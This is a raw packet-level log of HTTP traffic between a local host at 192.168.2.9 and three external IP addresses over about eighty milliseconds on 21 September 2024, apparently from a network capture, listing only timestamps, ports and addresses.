Sep 21, 2024 14:48:09.671569109 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671580076 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671591043 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671600103 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.671602011 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671614885 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671618938 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.671627045 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671638966 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671648026 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.671662092 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.671679974 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.672101021 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672118902 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672128916 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672141075 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672151089 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672158003 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.672163010 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672174931 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672179937 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.672187090 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672198057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672208071 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672209024 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.672219038 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672228098 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.672230959 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672241926 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672251940 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672257900 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.672264099 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672274113 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672285080 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672285080 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.672297001 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672305107 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.672308922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672321081 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.672323942 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.672344923 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.672358990 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.673083067 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673094988 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673106909 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673118114 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673129082 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673140049 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673140049 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.673151016 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673161983 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673173904 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673173904 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.673185110 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673194885 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673204899 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673214912 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673224926 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673229933 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.673237085 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673249006 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673249960 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.673259974 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.673269987 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.673270941 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.673289061 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.673291922 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.673300028 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.673310995 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.673311949 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.673357964 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.674057007 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674068928 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674079895 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674089909 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674102068 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674110889 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674122095 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674123049 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.674133062 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674139977 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.674148083 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674158096 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674164057 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.674169064 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674180984 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674190044 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.674192905 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674205065 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674206972 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.674216986 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674222946 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.674227953 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674240112 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674251080 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674263000 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.674262047 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.674283028 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.674299002 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.676366091 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.676420927 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.676426888 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.676433086 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.676471949 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.676492929 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.676511049 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.676522970 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.676532984 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.676544905 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.676558971 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.676573992 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.676606894 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.676645994 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.676688910 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.676861048 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.676908970 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.676909924 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.676949978 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.677009106 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.677057981 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.677073956 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.677084923 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.677119970 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.677120924 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.677169085 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.677175045 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.677186966 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.677231073 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.677237988 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.677237988 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.677270889 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.677275896 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.677316904 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.677997112 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.678041935 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.678042889 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.678055048 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.678087950 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.678103924 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.678172112 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.678184986 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.678195000 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.678208113 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.678222895 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.678253889 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.678265095 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.678308010 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.678971052 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.678982019 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.678992987 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.679019928 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.679048061 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.679131031 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.679141998 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.679152012 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.679162979 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.679173946 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.679182053 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.679203033 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.679223061 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.679919004 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.679930925 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.679940939 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.679970026 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.679986954 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.680016041 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.680027962 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.680037975 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.680047035 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.680068016 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.680088043 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.703890085 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.703902006 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.703912973 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704051971 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704061985 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704073906 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704085112 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704117060 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.704118013 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.704161882 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.704200029 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704210043 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704220057 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704245090 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.704262018 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.704391956 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704402924 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704412937 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704423904 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704432964 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.704452038 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.704478025 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.704521894 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704559088 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.704618931 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704629898 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704639912 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704652071 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704663038 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.704664946 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.704688072 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.704711914 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.705147982 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705158949 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705172062 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705197096 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.705224037 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.705240011 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705250978 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705281019 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.705331087 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705343008 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705368042 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.705395937 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.705683947 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705729961 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705734968 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.705743074 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705771923 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.705792904 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.705871105 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705882072 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705892086 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705904007 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.705919027 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.705948114 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.706008911 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706027031 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706037045 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706046104 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.706075907 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.706630945 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706641912 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706653118 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706692934 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.706721067 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.706789970 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706801891 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706811905 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706824064 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706830025 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.706846952 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.706876040 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.706942081 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706952095 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706963062 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.706995964 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.707017899 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.710705042 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.710716009 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.710726976 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.710736990 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.710781097 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.710814953 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.729839087 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.729850054 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.729856968 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.729917049 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.733365059 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.733376026 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.733458042 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.750288963 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750300884 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750338078 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750355005 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.750390053 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.750416040 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750428915 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750439882 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750466108 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.750490904 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.750551939 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750565052 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750610113 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.750684977 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750695944 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750705957 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750716925 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750727892 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750740051 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.750740051 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750761032 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750761986 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.750933886 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750945091 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750953913 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.750972033 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.750972033 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.750988007 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.751018047 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751029015 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751035929 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.751089096 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.751097918 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751108885 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751120090 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751132011 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751147032 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.751190901 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.751395941 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751406908 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751416922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751429081 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751441002 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751444101 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.751451969 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751462936 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751473904 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751485109 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.751487017 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751497984 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751512051 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751523972 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.751554012 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.751741886 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751760006 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751770973 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751784086 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751794100 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751797915 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.751806021 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751816988 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.751828909 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.751851082 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.751871109 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.752048969 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752059937 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752069950 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752080917 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752094984 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752105951 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752109051 CEST	49712	80	192.168.2.9	103.130.147.211
